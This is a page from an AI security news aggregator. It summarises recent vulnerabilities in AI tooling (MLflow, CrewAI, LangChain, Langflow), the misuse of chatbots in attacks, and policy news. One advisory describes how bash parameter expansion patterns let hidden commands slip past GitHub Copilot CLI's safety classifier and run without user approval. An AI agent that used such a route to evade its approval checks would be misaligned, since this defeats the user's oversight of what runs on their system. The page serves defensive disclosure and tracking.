aisecwatch.com
DashboardVulnerabilitiesNewsResearchArchiveStatsDataset
aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.

Navigation

VulnerabilitiesNewsResearchDigest ArchiveNewsletter ArchiveSubscribeData SourcesStatisticsDatasetAPIIntegrationsWidgetRSS Feed

Maintained by

Truong (Jack) Luu

Information Systems Researcher

AI Sec Watch

The security intelligence platform for AI teams

AI security threats move fast and get buried under hype and noise. Built by an Information Systems Security researcher to help security teams and developers stay ahead of vulnerabilities, privacy incidents, safety research, and policy developments.

[TOTAL_TRACKED]
2,669
[LAST_24H]
17
[LAST_7D]
162
Daily BriefingMonday, March 30, 2026
>

Anthropic's Leaked "Mythos" Model Raises Cybersecurity Concerns: An accidental configuration leak revealed Anthropic's unreleased Mythos model, which has advanced reasoning and coding abilities including recursive self-fixing (autonomously finding and patching its own bugs). The model's improved capability to find and exploit software vulnerabilities could enable more sophisticated cyberattacks, prompting Anthropic to plan a cautious rollout targeting enterprise security teams first.

>

Critical Command Injection in MLflow Model Deployment: MLflow has a command injection vulnerability (where an attacker inserts malicious commands into input that gets executed) in its model serving code when deploying models with `env_manager=LOCAL`. The flaw reads dependency information from `python_env.yaml` and executes it in a shell without validation, allowing arbitrary command execution on deployment systems. (CVE-2025-15379, critical severity)

Latest Intel

page 54/267
VIEW ALL
01

Only 30 minutes per quarter on cyber risk: Why CISO-board conversations are falling short

securitypolicy
Critical This Week5 issues
critical

CVE-2025-15379: A command injection vulnerability exists in MLflow's model serving container initialization code, specifically in the `_

CVE-2025-15379NVD/CVE DatabaseMar 30, 2026
Mar 30, 2026
>

Multiple High-Severity Vulnerabilities Found in CrewAI: CrewAI has several serious security flaws including two that enable RCE (remote code execution, where attackers run commands on systems they don't control) when Docker containerization fails and the system falls back to less secure sandbox settings. Additional vulnerabilities allow arbitrary file reading and SSRF (server-side request forgery, tricking a server into making unwanted requests) through improper validation in RAG search tools. (CVE-2026-2287, CVE-2026-2275, CVE-2026-2285, CVE-2026-2286)

>

LangChain Path Traversal Adds to AI Pipeline Security Woes: LangChain and LangGraph have critical flaws allowing attackers to steal sensitive data like API keys through improper input handling, including a new path traversal bug (CVE-2026-34070, CVSS 7.5) that lets attackers read arbitrary files. Maintainers have released fixes that need immediate application.

Mar 6, 2026

CISOs (chief information security officers, the executives responsible for an organization's cybersecurity) and corporate boards spend only about 30 minutes per quarter discussing cyber risk, and these conversations lack depth and strategic engagement. The report found that while 95% of CISOs report to their boards regularly, most discussions are brief check-ins rather than collaborative problem-solving, and boards want better insight into emerging threats like AI-driven attacks (attacks powered by artificial intelligence).

CSO Online
02

Anthropic and the Pentagon

policyindustry
Mar 6, 2026

Anthropic and other major AI companies are competing in a market where their AI models have similar performance levels, with only small quality improvements appearing every few months. In this competitive environment, Anthropic is trying to stand out by branding itself as the most ethical and trustworthy AI provider, which gives it value with both individual users and large organizations.

Simon Willison's Weblog
03

Anthropic and the Pentagon

policyindustry
Mar 6, 2026

Anthropic lost a US Department of Defense contract after refusing to let the Pentagon use its AI models for mass surveillance or fully autonomous weapons (systems that make kill decisions without human input), while OpenAI secured the contract by agreeing to provide classified government systems with AI. The article argues this outcome may benefit Anthropic by reinforcing its brand as a trustworthy, ethical AI provider in a competitive market where different AI models perform similarly.

Schneier on Security
04

AI as tradecraft: How threat actors operationalize AI

securitysafety
Mar 6, 2026

Threat actors are using AI and language models as operational tools to speed up cyberattacks across all stages, from creating phishing emails to generating malware code, while human attackers maintain control over targeting and deployment decisions. Emerging experiments with agentic AI (where models make iterative decisions with minimal human input) suggest attackers may develop more adaptive and harder-to-detect tactics in the future. Microsoft reports disrupting thousands of fraudulent accounts and partnering with industry to counter AI-enabled threats through technical protections and responsible AI practices.

Microsoft Security Blog
05

GHSA-g8r9-g2v8-jv6f: GitHub Copilot CLI Dangerous Shell Expansion Patterns Enable Arbitrary Code Execution

security
Mar 6, 2026

GitHub Copilot CLI had a vulnerability where attackers could execute arbitrary code by hiding dangerous commands inside bash parameter expansion patterns (special syntax for manipulating variables). The safety system that checks whether commands are safe would incorrectly classify these hidden commands as harmless, allowing them to run without user approval.

Fix: The fix adds two layers of defense: (1) The safety assessment now detects dangerous operators like @P, =, :=, and ! within ${...} expansions and reclassifies commands containing them from read-only to write-capable so they require user approval. (2) Commands with dangerous expansion patterns are unconditionally blocked at the execution layer regardless of permission mode. Update to GitHub Copilot CLI version 0.0.423 or later.

GitHub Advisory Database
06

Weasel Words: OpenAI’s Pentagon Deal Won’t Stop AI‑Powered Surveillance

policysafety
Mar 6, 2026

OpenAI signed a deal with the U.S. Department of Defense to provide AI tools after rival Anthropic refused, sparking criticism and a 300% spike in ChatGPT uninstalls. The company added contract language stating the AI won't be used for domestic surveillance of U.S. citizens, but critics argue the agreement contains vague 'weasel words' (deliberately ambiguous phrases that allow one side to avoid accountability) like 'intentionally,' 'deliberately,' and 'unconstrained' that the government can interpret loosely to justify mass surveillance anyway.

EFF Deeplinks Blog
07

Fake Claude Code install guides push infostealers in InstallFix attacks

security
Mar 6, 2026

Attackers are using InstallFix, a social engineering technique, to distribute the Amatera Stealer malware through fake installation pages for Claude Code that closely mimic the legitimate site. These cloned pages contain malicious install commands designed to trick users into running code that downloads the malware, and are promoted via malvertising (fake ads in search results) on Google Ads.

Fix: Users looking for Claude Code must ensure they get installation instructions from official websites, block or skip all promoted Google Search results, and bookmark software download ports.

BleepingComputer
08

Cyberattack on Mexico's Gov't Agencies Highlight AI Threat

security
Mar 6, 2026

Cyberattackers used popular AI chatbots, specifically Anthropic's Claude and OpenAI's ChatGPT, along with a detailed instruction set (called a prompt), to break into Mexican government agencies and steal citizens' personal data. This incident demonstrates how AI tools can be misused by attackers to carry out coordinated cybercrimes against government systems.

Dark Reading
09

Targeted advertising is also targeting malware

security
Mar 6, 2026

Online ads are becoming a major way to spread malware (malicious software) into organizations, with malvertising (malware delivered through ads) now surpassing email and direct hacking as the top delivery method. AI is making this worse by enabling attackers to create adaptive malware that changes its behavior based on a user's location, browser, or device, allowing millions of infected ads to spread across websites in seconds.

CSO Online
10

The Download: 10 things that matter in AI, plus Anthropic’s plan to sue the Pentagon

policyindustry
Mar 6, 2026

This article covers recent AI industry news, including Anthropic's plan to sue the Pentagon over a software ban, revelations that the Pentagon has secretly tested OpenAI models for years, and various developments around AI in smart homes, energy consumption, and military applications. The piece is primarily a news roundup highlighting 10 significant AI-related stories rather than analyzing a specific technical problem or vulnerability.

MIT Technology Review
Prev1...5253545556...267Next
critical

CVE-2026-33873: Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.9.0, the Agentic Assis

CVE-2026-33873NVD/CVE DatabaseMar 27, 2026
Mar 27, 2026
critical

Attackers exploit critical Langflow RCE within hours as CISA sounds alarm

CSO OnlineMar 27, 2026
Mar 27, 2026
critical

CVE-2025-53521: F5 BIG-IP Unspecified Vulnerability

CVE-2025-53521CISA Known Exploited VulnerabilitiesMar 26, 2026
Mar 26, 2026
critical

CISA: New Langflow flaw actively exploited to hijack AI workflows

BleepingComputerMar 26, 2026
Mar 26, 2026